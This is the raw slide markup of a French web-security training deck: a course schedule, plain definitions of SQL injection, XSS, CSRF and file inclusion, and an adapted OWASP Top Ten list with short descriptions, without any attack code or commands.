            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Généralités + exercice</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>RGPD &amp; Principes de protection des données</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Jour 2 (jeudi)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Failles communes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>TP : Injection SQL (Python &amp; PHP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Jour 3 (vendredi)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Failles communes (suite)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>TP : XSS, CSRF, RFI (PHP)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="Straight Connector 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18B100A6-1EBC-40AB-BB7E-26807F3CF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5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC3826BF-5439-4840-ACEC-35CC76BD7587}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10919012" y="6356350"/>
            <a:ext cx="672354" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C3DB2ADC-AF19-4574-8C10-79B5B04FCA27}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>61</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32438551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9" name="Rectangle 13">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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9172AB4-C6FC-4961-B1EA-A0CFA901521A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548641" y="960594"/>
            <a:ext cx="6079575" cy="4936812"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="5400" b="1" cap="none" dirty="0"/>
              <a:t>Failles communes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5400" cap="none" dirty="0">
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Connector 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA98CE3-81A7-4FFE-A047-9AA65998D8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315200" y="1733549"/>
            <a:ext cx="0" cy="339090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CB168234-A469-4822-AFD0-DACF9AD0001C}"/>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latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:t>62</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1800">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="208762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590F21-A5BA-477C-9A35-42D4375D745E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700635" y="922096"/>
            <a:ext cx="10691265" cy="1016432"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>4 principales </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>FAILLEs</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B945736-D24E-4303-8E49-555FA194C19F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700635" y="1938528"/>
            <a:ext cx="10691265" cy="4289642"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" u="sng" dirty="0"/>
              <a:t>SQLI : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>un envoie de donnée non fiable à un interpréteur dans le cadre d’une commande ou d’une requête</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" u="sng" dirty="0"/>
              <a:t>XSS : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>une inclusion de donnée non fiables dans une page web sans validation ou échappement approprié</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" u="sng" dirty="0"/>
              <a:t>CSRF : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>un envoie à une personne ayant des droits d'une adresse permettant d’effectuer des actions sur la base de donnée</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" u="sng" dirty="0"/>
              <a:t>RFI : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>une inclusion d’un fichier externe permettant l’affichage des variables de la page contenant des accès (mot de passe etc.)</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" u="sng" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41F4EC6A-70FF-4B67-8ED3-0994A153E305}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C3DB2ADC-AF19-4574-8C10-79B5B04FCA27}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>63</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="82084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590F21-A5BA-477C-9A35-42D4375D745E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700635" y="922096"/>
            <a:ext cx="10691265" cy="1016432"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Failles communes – OWSAP Top TEN</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Top 10 Web Application Security Risks</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B945736-D24E-4303-8E49-555FA194C19F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700635" y="1938528"/>
            <a:ext cx="10691265" cy="4289642"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>Injection SQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Broken </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Exposition de données sensibles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>XML Entités externes (XXE)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Broken Access Control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Misconfiguration</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>Cross-Site Scripting XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" u="sng" dirty="0"/>
              <a:t>Cross Site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" u="sng" dirty="0" err="1"/>
              <a:t>Request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" u="sng" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" u="sng" dirty="0" err="1"/>
              <a:t>Forgery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" u="sng" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" u="sng" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" u="sng" dirty="0"/>
              <a:t>Local </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" u="sng" dirty="0" err="1"/>
              <a:t>Remote</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" u="sng" dirty="0"/>
              <a:t> File Inclusion RFI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Insecure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Deserialization</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using Components with Known Vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Insufficient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Logging</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> &amp; Monitoring</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" u="sng" dirty="0"/>
              <a:t>Attaque par force brute et dictionnaire</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41F4EC6A-70FF-4B67-8ED3-0994A153E305}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C3DB2ADC-AF19-4574-8C10-79B5B04FCA27}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>64</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="320129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590F21-A5BA-477C-9A35-42D4375D745E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700635" y="922096"/>
            <a:ext cx="10691265" cy="1016432"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Failles communes – OWSAP Top TEN</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Top 10 Web Application Security Risks</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B945736-D24E-4303-8E49-555FA194C19F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700635" y="1938528"/>
            <a:ext cx="10691265" cy="4289642"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>Injection SQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>Les failles d'injection, telles que l'injection SQL, NoSQL, OS et LDAP, se produisent lorsque des données non fiables sont envoyées à un interpréteur dans le cadre d'une commande ou d'une requête. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>Les données hostiles de l'attaquant peuvent inciter l'interpréteur à exécuter des commandes non souhaitées ou à accéder à des données sans autorisation appropriée.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>Broken </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1"/>
              <a:t>Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>Les fonctions d'application liées à l'authentification et à la gestion des sessions sont souvent mises en œuvre de manière incorrecte.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>Exposition de données sensibles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>De nombreuses applications Web et API ne protègent pas correctement les données sensibles, telles que les données financières, les données de santé et les informations nominatives. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41F4EC6A-70FF-4B67-8ED3-0994A153E305}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
